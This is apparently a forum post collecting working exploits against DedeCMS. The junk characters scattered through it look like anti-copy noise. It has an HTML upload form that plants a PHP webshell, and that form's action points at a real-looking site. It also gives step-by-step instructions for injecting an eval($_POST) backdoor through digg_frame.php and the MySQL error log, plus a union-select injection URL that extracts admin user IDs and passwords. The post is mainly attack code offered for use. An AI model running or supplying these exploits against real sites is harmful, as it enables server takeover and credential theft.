9 G4 j& | H+ r5 i- l2 J9 M</head>, O! E- N ?( F! C5 S3 D0 ~
<body style="FONT-SIZE: 9pt">/ j: Z& @; z' @8 u2 [1 w
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />. F4 [5 i7 c/ Y/ a/ f$ o! f& t
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>) `4 K6 ~: H# ?, Q
<input type='hidden' name='activepath' value='/data/cache/' />
' u/ J0 H) u y. d3 b, m* j% d3 ~<input type='hidden' name='cfg_basedir' value='../../' />
7 ~3 b) c' W7 K7 o1 C4 r<input type='hidden' name='cfg_imgtype' value='php' />& |' a4 w& F% H9 }1 S
<input type='hidden' name='cfg_not_allowall' value='txt' />5 \# e9 q4 f. C" q5 a$ J# a! {
<input type='hidden' name='cfg_softtype' value='php' />
7 x: x3 q) v$ q! d2 L) F, E<input type='hidden' name='cfg_mediatype' value='php' />
) Q V A/ D# S<input type='hidden' name='f' value='form1.enclosure' />: `6 a$ ~' U; t+ V0 I- L
<input type='hidden' name='job' value='upload' />' w9 B. g: I( C4 p
<input type='hidden' name='newname' value='fly.php' />! W* N- Q% D. \" r2 v
Select U Shell <input type='file' name='uploadfile' size='25' />
: w4 s8 i! h/ ~. ]* I: ^8 ]1 Y<input type='submit' name='sb1' value='确定' />
* x; Y) Z0 T' T9 m/ F; x6 G</form>
7 {4 G I) ^9 F8 l' h3 ]+ e<br />It's just a exp for the bug of Dedecms V55...<br />
7 Z6 A' b7 b; E( L" O8 x5 {" b% NNeed register_globals = on...<br />8 N4 b p7 Y$ z
Fun the game,get a webshell at /data/cache/fly.php...<br />
6 I$ H) K- }# w</body>3 X" U6 j( L- D. `3 v5 q* F$ U5 n
</html>: _8 h* P0 ?' m9 M" A% D
" z# P8 d$ Q/ L1 d. ]0 \( [ p4 ]% ]$ k9 s8 z% h
% V: n2 j0 ]3 V
- _. j9 B; T1 o% z$ y( d( E
8 E: z9 `; T: T6 B2 X) v
! Y, ~2 h% s% F1 v! `" j
t% L9 M9 D3 h0 B. ^( ~! `. Z3 K- D7 u1 [8 t3 z: i
( J. p0 ^$ ~: z$ B, g( n* i) S0 O& W9 Q
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
* q( U9 }$ p( Z% Q利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。# Q3 W0 {6 S) a. G! p* m7 B
1. 访问网址:( [$ u$ g. a, a8 k
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>4 H: j/ k- H* ^
可看见错误信息& v9 o( g0 L9 V2 f5 [% B
1 `. g, o$ D \; e
1 ^- A9 C$ W/ ]& E% f3 k5 }
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
$ A- d: x6 S& @" E Rint(3) Error: Illegal double '1024e1024' value found during parsing
& P% z7 p& K! h7 [' a! dError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>' s' F) n+ k0 [
. w+ @: Q. q- |' b
% I% Q( _$ `9 f9 L( f: ]+ T3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是3 L ^7 D! C7 x0 X/ `
U7 X3 u) d0 f3 A
% P2 a( d! v1 t+ O5 F# v: u6 I. \, ^<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
8 s9 Z+ H" u* P% q8 x5 { C. p
2 g" N5 O, E* K4 C4 k7 n6 c/ Y, i$ ` l1 S7 ^* e
按确定后的看到第2步骤的信息表示文件木马上传成功.# [7 r* L' n2 _. D% G
6 `5 y- t2 L3 f z" Z( T" d
b* C+ j: b* N* j2 j
6 e' _$ ^. g3 r* f A
6 g" q+ X; V$ u; l3 J- t% J: P+ {0 T' B7 M
7 O- l- s* B% j( x9 q0 E
( I+ y5 P$ S$ }1 h' k5 v' X h, O+ v5 y
! t0 y* s( c) O' j3 V% d5 Z* G) B' Y. a9 [5 d4 P, C
+ T$ V7 k- i1 s O) A( E
, G8 f: k% ~# j9 E织梦(DedeCms)plus/infosearch.php 文件注入漏洞# x) o- S2 j: [/ ]) \& Z# `8 W
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对